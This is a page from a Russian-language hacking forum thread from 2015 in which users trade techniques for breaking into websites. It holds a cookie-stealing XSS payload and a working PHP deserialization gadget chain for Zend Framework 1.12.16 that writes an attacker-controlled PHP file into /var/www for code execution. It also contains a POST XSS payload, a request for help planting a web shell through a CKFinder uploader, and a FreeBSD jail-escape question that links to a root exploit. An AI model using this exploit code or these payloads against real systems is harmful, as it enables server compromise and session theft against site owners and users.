Старый 21.10.2015, 16:00   #3471
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Потестил немного, выяснил что подойдёт GET и POST. Главное чтобы начального слеша не было GET /--><script>alert(document.cookie);#<!-- HTTP/1.1.
crlf вне форума   Ответить с цитированием
Старый 21.10.2015, 23:34   #3472
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Увы, без начального слэша нельзя. Как понимаю, XSS-ка на странице ошибки? Попробуйте вызвать её другими методами: 404 (страница не существует), 403 (доступ запрещен), 414 (длинный URL), 413 (большой запрос), 431 (Большой заголовок, к примеру Referer) и пр.
__________________
На правах рекламы.
NameSpace вне форума   Ответить с цитированием
Старый 22.10.2015, 00:40   #3473
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Пробовал, работает только без слеша. Как я понял, если слеша нет отрабатывает один обработчик, иначе другой, который кодирует цсску в хтмл сущности. Спасибо за ответы и советы, попробую дальше покопать.
crlf вне форума   Ответить с цитированием
Старый 28.10.2015, 01:12   #3474
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Имеется свежий PHP, CMS с использованием Zend и не фильтруемый unserialize. Помогите найти актуальный RCE вектор.

Нагуглил вариант с нулл-байтом, но он работает только на PHP <= 5.3.3
crlf вне форума   Ответить с цитированием
Старый 29.10.2015, 09:26   #3475
errnick2
 
Регистрация: 20.02.2015
Сообщений: 4
Репутация: 0
По умолчанию

помогите советом как залить шелл имея админку с ckeditor 3.4.1 (ckfinder.html) аплоадер который конвертирует и переименовывает файлы вида gallery_photo_1352189745_5098c7319b29b.jpg инклудов не нашел
errnick2 вне форума   Ответить с цитированием
Старый 29.10.2015, 12:11   #3476
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Цитата:
Сообщение от crlf Посмотреть сообщение
Имеется свежий PHP, CMS с использованием Zend и не фильтруемый unserialize. Помогите найти актуальный RCE вектор.

Нагуглил вариант с нулл-байтом, но он работает только на PHP <= 5.3.3
Немного подправил, теперь работает на свежих PHP. RCE только для Apache с "AddHandler php5-script .php" .

Код:
<?php
class Zend_Search_Lucene_Index_FieldInfo
{
    public $name = '<?php phpinfo(); ?>';
}
 
class Zend_Search_Lucene_Storage_Directory_Filesystem
{
    protected $_dirPath = null;
     
    public function __construct($path)
    {
        $this->_dirPath = $path;
    }
}
 
interface Zend_Pdf_ElementFactory_Interface {}
 
class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface
{
    protected $_docCount = 1;
    protected $_name = 'test.php';
    protected $_directory;
    protected $_fields;
    protected $_files;
     
    public function __construct($directory, $fields)
    {
        $this->_directory = $directory;
        $this->_fields    = array($fields);
        $this->_files     = new stdClass;
    }
}    
 
class Zend_Pdf_ElementFactory_Proxy
{
    private $_factory;
     
    public function __construct(Zend_Pdf_ElementFactory_Interface $factory)
    {
        $this->_factory = $factory;
    }
}

$directory = new Zend_Search_Lucene_Storage_Directory_Filesystem("/var/www/");
$__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo);
$____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory);
 
echo urlencode(serialize(array($____proxy)));

?>
Создаёт файл /var/www/test.php.fnm

Последний раз редактировалось crlf; 08.11.2016 в 02:24..
crlf вне форума   Ответить с цитированием
Старый 29.10.2015, 12:37   #3477
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

crlf
Молодец! Это для какого зенда - первого или второго?
Видел еще новый способ в блоге d0znpp, но потом он его удалил.
SynQ вне форума   Ответить с цитированием
Старый 29.10.2015, 12:58   #3478
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

SynQ, забыл написать, тестил на Zend Framework 1.12.16
crlf вне форума   Ответить с цитированием
Старый 01.11.2015, 01:07   #3479
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Вопрос, как выйти из Jail?
Цитата:
FreeBSD 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r25319: Mon Jul 15 CEST 2013 /usr/obj/usr/src/sys/LG amd64
Рут добывается с помощью http://pastebin.com/mvrVAtJw
https://rdot.org/forum/showthread.php?t=2775
Tim вне форума   Ответить с цитированием
Старый 01.11.2015, 04:30   #3480
Molofya
 
Регистрация: 09.07.2015
Сообщений: 21
Репутация: -1
По умолчанию

Имеется POST XSS дырка самая простейшая:
test.ru/script.html
POST:
search=123"><h1>XSS</h1>

Все бы ничего, но при таком POST запросе сайт проверяет наличие рефа, и чтобы обязательно там был test.ru (левые домены не катят).
Вопрос. При таких условиях возможно провести XSS атаку, или в данном случае вариантов проэксплуатировать уязвимость нету?
Molofya вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot